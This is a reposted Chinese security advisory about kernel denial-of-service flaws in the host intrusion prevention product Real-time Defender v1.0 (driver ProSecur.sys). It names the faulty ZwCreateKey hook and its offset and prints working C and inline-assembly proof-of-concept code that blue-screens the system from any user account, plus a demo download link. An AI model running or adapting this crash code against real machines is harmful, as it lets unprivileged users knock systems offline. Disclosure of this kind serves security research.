Real-Time Defender v1.0 多处内核拒绝服务漏洞 's

admin
admin
admin
139298
文章
114
评论
2017年4月27日06:30:51评论323 views字数 759阅读2分31秒阅读模式
摘要

作者:MJ0011Real-time Defender Professional(简称RTD)是一款主机入侵防护系统。RTD的最新版本v1.0中存在多处内核拒绝服务漏洞,可导致任意权限用户在安装了RTD的系统上可引发蓝屏。

作者:MJ0011

Real-time Defender Professional(简称RTD)是一款主机入侵防护系统。

RTD的最新版本v1.0中存在多处内核拒绝服务漏洞,可导致任意权限用户在安装了RTD的系统上可引发蓝屏。

出问题的组件:ProSecur.sys ,版本:1.1.1.0,CheckSum = 0x00046c99 , TimeStamp = 0x48a51de8

该问题同之前Malware defender的问题类似(http://hi.baidu.com/mj0011/blog/item/464aad31aed4f7ae5fdf0e4f.html)RTD在很多SSDT HOOK函数中,对参数检查不够严格,就将参数传递给系统的 ZwXxx函数,结果引发蓝屏。

示例函数:hk_ZwCreateKey

偏移:0x21f56

测试代码:

WCHAR xx[] = L”xxxx_fuck_rtd”;

HMODULE hlib = LoadLibrary(“ntdll.dll”);
PVOID p = GetProcAddress(hlib , “ZwCreateKey”);

OBJECT_ATTRIBUTES oba ;
UNICODE_STRING strname ;
strname.Buffer = xx;
strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ;

InitializeObjectAttributes(&oba , &strname ,0 , 0,(PVOID)0x80000000);

__asm{

push 0
push 0
push 0
push 0
lea eax,oba
push eax
push 0
push 0
call p

}

return ;

测试程序下载:http://mj0011.ys168.com 漏洞演示目录下BSOD_rtd.rar

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月27日06:30:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Real-Time Defender v1.0 多处内核拒绝服务漏洞 'shttp://cn-sec.com/archives/45638.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息